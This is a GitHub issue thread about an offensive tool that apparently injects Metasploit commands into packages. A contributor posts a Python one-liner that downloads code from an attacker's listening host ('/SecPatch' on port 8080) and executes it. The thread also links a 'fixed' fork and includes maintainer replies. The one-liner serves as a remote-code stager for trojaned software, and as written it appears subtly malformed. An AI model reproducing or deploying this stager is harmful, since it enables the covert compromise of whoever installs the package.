### ISSUE TITLE
your msf command that you inject on this tool is not up to date !!

### ISSUE THREAD

**Issue by GetRektBoy724** [ChaitanyaHaritash/kimi#2]
if yo see kimi.py line 79.....that command its not working again now if you use metasploit-framework version 5.0 until latest version and i changed the command to this:

python -c "import sys;u=import('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://"""+str(go.lhost)+""":8080/SecPatch'); exec(r.read());"

https://github.com/GetRektBoy724/kimi-FIXED-VERSION [fixed version]

**Comment by ChaitanyaHaritash** [comment]
Hey Sorry for late response. Thanks for catching up.. I will update Kimi soon once i get time. Im thinking to re-implement code but im occupied with other things :) you might get hit with new update in quick few days.

**Comment by GetRektBoy724** [comment]
Ok.thanks for reply

**Comment by ChaitanyaHaritash** [comment]
The Code is finally updated. I somehow managed to get time from my schedule to update the code. kindly make a test and lemme know if its working before final release :)

**Comment by GetRektBoy724** [comment]
Ok thats great...test it before you release it

**Comment by GetRektBoy724** [comment]
please enter me into the group developer

Pada tanggal Rab, 24 Apr 2019 pukul 20.54 Muhammad syihan Zhafiri <
virusleader324@gmail.com> menulis:

**Comment by ChaitanyaHaritash** [comment]
Hey! unfortunately we all are less active and kind of busy in real life and other projects. so not sure if team is interested in new members.
